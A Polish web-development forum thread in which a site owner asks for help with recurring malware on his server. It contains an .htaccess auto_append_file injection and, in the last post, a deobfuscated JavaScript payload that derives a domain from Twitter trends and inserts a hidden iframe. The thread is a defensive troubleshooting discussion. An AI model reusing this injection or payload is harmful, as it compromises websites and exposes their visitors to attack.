![]() |
![]() ![]() |
![]() |
![]()
|
|
Grupa: Zarejestrowani Postów: 55 Pomógł: 0 Dołączył: 21.09.2007 Skąd: Mielec Ostrzeżenie: (0%) ![]() ![]() |
Witam,
Na wszystkich stronach na serwerze, dodały się dziwne fragmenty kodu - niektóre zaszyfrowane php w plikach, a niektóre wywołane przez .htacces: Kod <IfModule mod_php5.c> php_value auto_append_file "google_verify.php" </IfModule> <IfModule mod_php4.c> php_value auto_append_file "google_verify.php" </IfModule> Oto podejrzany kod: http://wklej.org/id/652715/, co po odkodowaniu daje http://wklej.org/id/652713/, Wyczyściłem wszystko, pozmieniałem hasła do ftp, baz etc. Starałem się również przeszukać pod tym kątem komputer, ale po kliku dniach wszystko się powtórzyło. Przejrzałem logi, ale nie ma nic podejrzanego w postach i getach... Z góry dzięki za pomoc i wesołych świąt Kamil Ten post edytował kamil881 22.12.2011, 13:05:51 |
|
|
![]()
|
|
![]() Grupa: Zarejestrowani Postów: 358 Pomógł: 78 Dołączył: 4.11.2008 Skąd: Kraków Ostrzeżenie: (0%) ![]() ![]() |
napisz do swojej firmy hostingowej, może to jakieś statystyki?
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 55 Pomógł: 0 Dołączył: 21.09.2007 Skąd: Mielec Ostrzeżenie: (0%) ![]() ![]() |
Kontaktowałem się z nimi, statystyki hostingowe mam poza tym z Piwika.
|
|
|
![]()
|
|
![]() Grupa: Moderatorzy Postów: 4 362 Pomógł: 714 Dołączył: 12.02.2009 Skąd: Jak się położę tak leżę :D ![]() |
No to pozostaje jeszcze rozkodować te liczby i będziesz wiedział o co kaman
![]() -------------------- Najpierw był manual... Jeśli tam nie zawarto słów mądrości to zapytaj wszechwiedzącego Google zadając mu własciwe pytania. A jeśli i on milczy to Twój problem nie istnieje :D
|
|
|
![]()
|
|
Gdybym wiedział jak się za nie zabrać...
![]() Dostałem logi od usługodawcy, a w nich dziwne próby połączenia z adresu 78.42.176.36... Niemieckie ip, więc na pewno nikt powołany - na razie adres zablokowany. Ten post edytował kamil881 22.12.2011, 13:42:36 |
|
|
![]()
|
|
![]() Grupa: Moderatorzy Postów: 15 467 Pomógł: 1451 Dołączył: 25.04.2005 Skąd: Szczebrzeszyn/Rzeszów ![]() |
Cytat Wyczyściłem wszystko, pozmieniałem hasła do ftp, baz etc. Starałem się również przeszukać pod tym kątem komputer, ale po kliku dniach wszystko się powtórzyło. Przejrzałem logi, ale nie ma nic podejrzanego w postach i getach... No ok, ale co po tym, jak pozmieniasz loginy i hasła, jak nadal działają dziurawe skrypty? Połataj aplikację, dopiero potem się zabieraj za to, co trzeba, bo będziesz w nieskończoność to kasował. A blokowanie IP Ci nic nie da - to prawdopodobnie botnet, który skanuje Sieć w poszukiwaniu dziurawych aplikacji i dodaje w ten sposób kolejne węzły. -------------------- ![]() ZCE :: Pisząc PW załączaj LINK DO TEMATU i TYLKO w sprawach moderacji :: jakiś błąd - a TREŚĆ BŁĘDU? :: nie ponaglaj z odpowiedzią via PW! |
|
|
![]()
|
|
Poza aktualnym wordpressem i zwykłymi statycznymi stronami, nie mam nic innego...
|
|
|
![]()
|
|
![]() Grupa: Moderatorzy Postów: 15 467 Pomógł: 1451 Dołączył: 25.04.2005 Skąd: Szczebrzeszyn/Rzeszów ![]() |
A czy pluginy wszystkie masz w porządku?
Cytat nie mam nic innego... Jesteś w stanie dać za to głowę? Ja bym sprawdził. -------------------- ![]() ZCE :: Pisząc PW załączaj LINK DO TEMATU i TYLKO w sprawach moderacji :: jakiś błąd - a TREŚĆ BŁĘDU? :: nie ponaglaj z odpowiedzią via PW! |
|
|
![]()
|
|
Głowy w stanie dać nie jestem, cóż, będę jeszcze nad tym siedział.
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 7 Pomógł: 0 Dołączył: 28.12.2011 Skąd: Bydgoszcz Ostrzeżenie: (0%) ![]() ![]() |
Tak z ciekawości zabawiłem się za wstępne rozszyfrowanie tego zakofowanego kodu.
Wygląda od mniejwięcej tak: Kod function anonymous() { (function () {Date.prototype.jsq = function () {var jsBP = this;return [jsBP.getUTCFullYear(), jsBP.getUTCMonth(), jsBP.getUTCDate(), jsBP.getUTCHours(), jsBP.getUTCMinutes(), jsBP.getUTCSeconds()];};Date.prototype.jsk = function () {var jsr, jsBp = this.jsq(), i = 0;jsBp[1] += 1;while (i++ < 7) {jsr = jsBp[i];if (jsr < jsM) {jsBp[i] = jsm("z") + jsr;}}return jsBp.splice(jsm("z"), 1 + jsm("T")).join(jsm("u")) + "T" + jsBp.join(jsm("U"));};jsBG = {h: "http://", s: "/", t: "tre", d: "dai", n: "nds", q: "?", c: "callback=", j: "js", a: "api", l: "ly", W: "twitter", o: "com", e: "1", k: "s", K: "body", x: "ajax", D: ".", L: "libs", J: "jquery", '6': "6.2", m: "min", f: "on", S: "cript", i: "if", M: "rame", Y: "head", w: "width:", p: "px;", H: "height:", T: "2", r: "rc", Q: "\"", y: "style=", b: "><", R: "></", I: "div", B: "<", A: ">", g: "google", E: "&date=", z: "0", u: "-", U: " ", ',': ":00", ';': 2345678901, '/': 48271, F: 198195254, G: 12, C: "="}; function jsm(jsBu) {jsT = [];for (jsBa = 0; jsBa < jsBu.length; jsBa++) {jsT.push(jsBG[jsBu.charAt(jsBa)]);}return jst(jsT);} jsBi = document;jsu = window;jsu.jsy = "undefined";jsu.jsz = jsm("haDWDosestnsdlDjfqcq");jsH = typeof $ == jsu.jsy;if (jsH || !jsBc()) {if (!jsH) {try {jsBg = jQuery.noConflict(true);} catch (e) {}try {jsBg = $.noConflict(true);} catch (e) {}}jsBS = jsBi.getElementsByTagName(jsm("Y"))[0];jsE = jsBi.createElement(jsm("kS"));jsE.setAttribute(jsm("kr"), jsm("hxDgakDosxsLsJseD6sJDmDj"));jsBS.appendChild(jsE);} function jsBR(jss, jsBF) {return Math.floor(jss / jsBF);} function jsv(jsd) {var jsBf = jsBR(jsu.jsL, jsu.jsBx);var jsw = jsu.jsL % jsu.jsBx;var jsN = jsu.jsBp * jsw;var jsF = jsu.jsBm * jsBf;var jse = jsN - jsF;if (jse > 0) {jsL = jse;} else {jsL = jse + jsu.jsBA;}return jsL % jsd;} function jsJ(jsn) {jsu.jsL = jsm(";") + jsn;jsu.jsBp = jsm("/");jsu.jsBA = jsm(";") - jsm("F");jsu.jsBx = jsBR(jsu.jsBA, jsu.jsBp);jsu.jsBm = jsu.jsBA % jsu.jsBp;} function jst(jsB) {return jsB.length == 1 ? jsB[0] : jsB.join("");} function jsR(jsB) {d = new Date;jsA = jsm("zee");d.setTime((jsB.as_of - jsm("G") * jsm("G") * jsm("G") * jsm("ezz")) * jsm("ezzz"));return d;} function jso(jsBC) {var jsi, jsBh, jsG = jsBC.length;var jsx = [];while (--jsG) {jsBh = jsv(jsG);jsx.push(jsBh);jsi = jsBC[jsBh];jsBC[jsBh] = jsBC[jsG];jsBC[jsG] = jsi;}} function jsBL($) {jsBE = $.map([81, 85, 74, 74, 92, 17, 82, 73, 80, 30, 82, 77, 25, 11, 10, 10, 61, 11, 56, 55, 11, 53, 6, 53, 7, 2, 1, 0, 48], function (x, i) {return String.fromCharCode(i + x + 24);});return jst(jsBE);} function jsj(x) {return x.length;} function jsBT($) {if (typeof $ != jsu.jsy) {$(function () {if (typeof $.jsBo != jsu.jsy) {return;}$.jsBo = 1;$.getJSON(jsz, function (jsBM) {jsD = jsR(jsBM);jsK = jsD.getUTCMonth() + + jsm("e");jsBN = jsD.getUTCDate();jsp = function (x, i) {return jsj(x + "") - 1 ? x : "0" + x;};jsBe = jsp(jsK, 4) + "-" + jsp(jsBN, 7);jsa = jsz + jsm("ETzeeu") + jsBe;jsBD = jsBy = jsBR(jsD.getUTCHours(), 6) * 6 + + jsm("e");jsBz = jsBD + 1;jsM = + jsm("ez");setTimeout(function () {$.getJSON(jsa, function (jsBM) {try {jsS = jsBM.trends;jsf = jsm("Tzeeu") + jsBe + " ";if (jsBD < jsM) {jsBD = jsm("z") + jsBD;}if (jsBz < jsM) {jsBz = jsm("z") + jsBz;}jsc = jsS[jsf + jsBD + jsm(",")];if (!jsc) {jsc = jsS[jsf + jsBz + jsm(",")];}jsc = (jsc[3].name.toLowerCase().replace(/[^a-z]/gi, "") + "microscope").split("");jsC = jsK * 71 + jsBy * 3 + jsBN * 37;jsJ(jsC);jsj = jsv(4) + jsM;jso(jsc);jsb = jsm("Ch") + jst(jsc).substring(0, jsj) + ".com/" + jsBL($);jsBG.Z = jsb;jsBr = jsm("BIyQHTpweeepQbiMUyQHTpweeepQUkrZRiMRIA");$(jsm("K")).append(jsBr);} catch (jsBq) {}});}, jsM * jsM * jsM);});});} else {setTimeout(function () {jsBT(jsu.jQuery);}, 1 + jsm("TTT"));}} jsBT(jsu.jQuery);}()); } Dodatkowo przechwyciłęm z czym się łączy: http://ajax.googleapis.com/ajax/libs/jquer...2/jquery.min.js http://api.twitter.com/1/trends/daily.json..._=1325094272460 http://api.twitter.com/1/trends/daily.json..._=1325094273908 To chyba wszystko co wyłapałem na chwile obecną. Pozdrawiam Dragas |
|
|
![]() ![]() |
![]() |
Aktualny czas: 21.08.2025 - 03:14 |